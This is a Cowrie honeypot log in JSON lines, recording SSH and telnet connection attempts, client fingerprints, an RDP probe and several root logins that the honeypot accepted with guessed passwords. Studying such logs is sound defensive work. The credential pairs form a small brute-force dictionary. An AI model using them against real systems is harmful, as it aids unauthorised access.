{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49770,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea46f36db219","protocol":"ssh","message":"New connection: 217.72.205.35:49770 (1.2.3.4:22) [session: ea46f36db219]","sensor":"my-vps","timestamp":"2025-08-24T15:12:39.845280Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:12:39.857551Z","src_ip":"217.72.205.35","session":"ea46f36db219"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":40068,"dst_ip":"1.2.3.4","dst_port":22,"session":"56556c6f82ae","protocol":"ssh","message":"New connection: 45.88.8.186:40068 (1.2.3.4:22) [session: 56556c6f82ae]","sensor":"my-vps","timestamp":"2025-08-24T15:13:35.311129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T15:13:35.791636Z","src_ip":"45.88.8.186","session":"56556c6f82ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T15:13:35.796346Z","src_ip":"45.88.8.186","session":"56556c6f82ae"}
{"eventid":"cowrie.session.connect","src_ip":"119.64.31.185","src_port":53260,"dst_ip":"1.2.3.4","dst_port":23,"session":"41de99705812","protocol":"telnet","message":"New connection: 119.64.31.185:53260 (1.2.3.4:23) [session: 41de99705812]","sensor":"my-vps","timestamp":"2025-08-24T15:13:37.333824Z"}
{"eventid":"cowrie.login.success","username":"root","password":"tracking","message":"login attempt [root/tracking] succeeded","sensor":"my-vps","timestamp":"2025-08-24T15:13:38.188314Z","src_ip":"45.88.8.186","session":"56556c6f82ae"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:13:38.786830Z","src_ip":"45.88.8.186","session":"56556c6f82ae"}
{"eventid":"cowrie.session.closed","duration":30.413740873336792,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:14:07.747429Z","src_ip":"119.64.31.185","session":"41de99705812"}
{"eventid":"cowrie.session.connect","src_ip":"125.44.160.121","src_port":55381,"dst_ip":"1.2.3.4","dst_port":22,"session":"5453a1c8b65f","protocol":"ssh","message":"New connection: 125.44.160.121:55381 (1.2.3.4:22) [session: 5453a1c8b65f]","sensor":"my-vps","timestamp":"2025-08-24T15:16:47.680851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T15:17:07.878865Z","src_ip":"125.44.160.121","session":"5453a1c8b65f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T15:17:07.888645Z","src_ip":"125.44.160.121","session":"5453a1c8b65f"}
{"eventid":"cowrie.login.success","username":"root","password":"sunucutokenleri","message":"login attempt [root/sunucutokenleri] succeeded","sensor":"my-vps","timestamp":"2025-08-24T15:18:22.441410Z","src_ip":"125.44.160.121","session":"5453a1c8b65f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49470,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed03a5deb1e4","protocol":"ssh","message":"New connection: 217.72.205.35:49470 (1.2.3.4:22) [session: ed03a5deb1e4]","sensor":"my-vps","timestamp":"2025-08-24T15:19:21.131959Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:19:21.143313Z","src_ip":"217.72.205.35","session":"ed03a5deb1e4"}
{"eventid":"cowrie.session.closed","duration":"394.8","message":"Connection lost after 394.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:23:22.532368Z","src_ip":"125.44.160.121","session":"5453a1c8b65f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64158,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcad60cfbf95","protocol":"ssh","message":"New connection: 217.72.205.35:64158 (1.2.3.4:22) [session: dcad60cfbf95]","sensor":"my-vps","timestamp":"2025-08-24T15:26:03.201679Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:26:03.209935Z","src_ip":"217.72.205.35","session":"dcad60cfbf95"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51584,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc6b62136441","protocol":"ssh","message":"New connection: 217.72.205.35:51584 (1.2.3.4:22) [session: bc6b62136441]","sensor":"my-vps","timestamp":"2025-08-24T15:32:55.333777Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:32:55.342421Z","src_ip":"217.72.205.35","session":"bc6b62136441"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":41474,"dst_ip":"1.2.3.4","dst_port":22,"session":"e725048556a7","protocol":"ssh","message":"New connection: 45.88.8.186:41474 (1.2.3.4:22) [session: e725048556a7]","sensor":"my-vps","timestamp":"2025-08-24T15:37:02.379847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T15:37:02.866736Z","src_ip":"45.88.8.186","session":"e725048556a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T15:37:02.868469Z","src_ip":"45.88.8.186","session":"e725048556a7"}
{"eventid":"cowrie.login.success","username":"root","password":"pass@1234","message":"login attempt [root/pass@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-24T15:37:06.196559Z","src_ip":"45.88.8.186","session":"e725048556a7"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:37:07.062459Z","src_ip":"45.88.8.186","session":"e725048556a7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52628,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bb20ea0ff6b","protocol":"ssh","message":"New connection: 217.72.205.35:52628 (1.2.3.4:22) [session: 5bb20ea0ff6b]","sensor":"my-vps","timestamp":"2025-08-24T15:39:29.175042Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:39:29.183341Z","src_ip":"217.72.205.35","session":"5bb20ea0ff6b"}
{"eventid":"cowrie.session.connect","src_ip":"86.16.175.213","src_port":60643,"dst_ip":"1.2.3.4","dst_port":23,"session":"718d120841a8","protocol":"telnet","message":"New connection: 86.16.175.213:60643 (1.2.3.4:23) [session: 718d120841a8]","sensor":"my-vps","timestamp":"2025-08-24T15:40:55.155023Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":39174,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e4eb72184fa","protocol":"telnet","message":"New connection: 79.124.8.120:39174 (1.2.3.4:23) [session: 0e4eb72184fa]","sensor":"my-vps","timestamp":"2025-08-24T15:41:25.811582Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-24T15:41:25.863561Z","src_ip":"79.124.8.120","session":"0e4eb72184fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T15:41:25.973155Z","src_ip":"79.124.8.120","session":"0e4eb72184fa"}
{"eventid":"cowrie.session.closed","duration":31.82603168487549,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:41:26.981034Z","src_ip":"86.16.175.213","session":"718d120841a8"}
{"eventid":"cowrie.session.connect","src_ip":"43.155.183.111","src_port":36358,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7fae35f6b70","protocol":"ssh","message":"New connection: 43.155.183.111:36358 (1.2.3.4:22) [session: f7fae35f6b70]","sensor":"my-vps","timestamp":"2025-08-24T15:41:38.548148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T15:41:38.549178Z","src_ip":"43.155.183.111","session":"f7fae35f6b70"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T15:41:38.838578Z","src_ip":"43.155.183.111","session":"f7fae35f6b70"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:41:46.548180Z","src_ip":"43.155.183.111","session":"f7fae35f6b70"}
{"eventid":"cowrie.session.connect","src_ip":"88.214.25.125","src_port":65457,"dst_ip":"1.2.3.4","dst_port":22,"session":"82554635b762","protocol":"ssh","message":"New connection: 88.214.25.125:65457 (1.2.3.4:22) [session: 82554635b762]","sensor":"my-vps","timestamp":"2025-08-24T15:43:06.776500Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-24T15:43:06.781882Z","src_ip":"88.214.25.125","session":"82554635b762"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:43:06.782456Z","src_ip":"88.214.25.125","session":"82554635b762"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.1","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:44:26.003316Z","src_ip":"79.124.8.120","session":"0e4eb72184fa"}
{"eventid":"cowrie.session.closed","duration":180.19597578048706,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:44:26.007054Z","src_ip":"79.124.8.120","session":"0e4eb72184fa"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50328,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ce10ad9199","protocol":"ssh","message":"New connection: 217.72.205.35:50328 (1.2.3.4:22) [session: f1ce10ad9199]","sensor":"my-vps","timestamp":"2025-08-24T15:46:22.669133Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:46:22.670210Z","src_ip":"217.72.205.35","session":"f1ce10ad9199"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56696,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae79352bcc61","protocol":"ssh","message":"New connection: 217.72.205.35:56696 (1.2.3.4:22) [session: ae79352bcc61]","sensor":"my-vps","timestamp":"2025-08-24T15:52:55.986758Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:52:55.988155Z","src_ip":"217.72.205.35","session":"ae79352bcc61"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.62","src_port":35900,"dst_ip":"1.2.3.4","dst_port":22,"session":"218108bc1cc8","protocol":"ssh","message":"New connection: 167.94.138.62:35900 (1.2.3.4:22) [session: 218108bc1cc8]","sensor":"my-vps","timestamp":"2025-08-24T15:53:25.157000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T15:53:27.472323Z","src_ip":"167.94.138.62","session":"218108bc1cc8"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-24T15:53:27.473556Z","src_ip":"167.94.138.62","session":"218108bc1cc8"}
{"eventid":"cowrie.session.closed","duration":"17.3","message":"Connection lost after 17.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:53:42.485588Z","src_ip":"167.94.138.62","session":"218108bc1cc8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50228,"dst_ip":"1.2.3.4","dst_port":22,"session":"62ff2d90b69c","protocol":"ssh","message":"New connection: 217.72.205.35:50228 (1.2.3.4:22) [session: 62ff2d90b69c]","sensor":"my-vps","timestamp":"2025-08-24T15:59:42.673626Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T15:59:42.675370Z","src_ip":"217.72.205.35","session":"62ff2d90b69c"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":45164,"dst_ip":"1.2.3.4","dst_port":22,"session":"0062f474c50b","protocol":"ssh","message":"New connection: 45.88.8.186:45164 (1.2.3.4:22) [session: 0062f474c50b]","sensor":"my-vps","timestamp":"2025-08-24T16:01:06.737492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:01:07.280268Z","src_ip":"45.88.8.186","session":"0062f474c50b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:01:07.280951Z","src_ip":"45.88.8.186","session":"0062f474c50b"}
{"eventid":"cowrie.login.success","username":"root","password":"Haleema123","message":"login attempt [root/Haleema123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:01:10.167871Z","src_ip":"45.88.8.186","session":"0062f474c50b"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:01:11.796014Z","src_ip":"45.88.8.186","session":"0062f474c50b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63612,"dst_ip":"1.2.3.4","dst_port":22,"session":"872160a5032d","protocol":"ssh","message":"New connection: 217.72.205.35:63612 (1.2.3.4:22) [session: 872160a5032d]","sensor":"my-vps","timestamp":"2025-08-24T16:06:14.933686Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:06:14.934978Z","src_ip":"217.72.205.35","session":"872160a5032d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":54924,"dst_ip":"1.2.3.4","dst_port":22,"session":"c07258e1a882","protocol":"ssh","message":"New connection: 45.88.8.215:54924 (1.2.3.4:22) [session: c07258e1a882]","sensor":"my-vps","timestamp":"2025-08-24T16:07:15.722742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:07:16.230428Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:07:16.231342Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
{"eventid":"cowrie.login.success","username":"root","password":"Aatish@123","message":"login attempt [root/Aatish@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:07:18.572040Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T16:07:19.671788Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
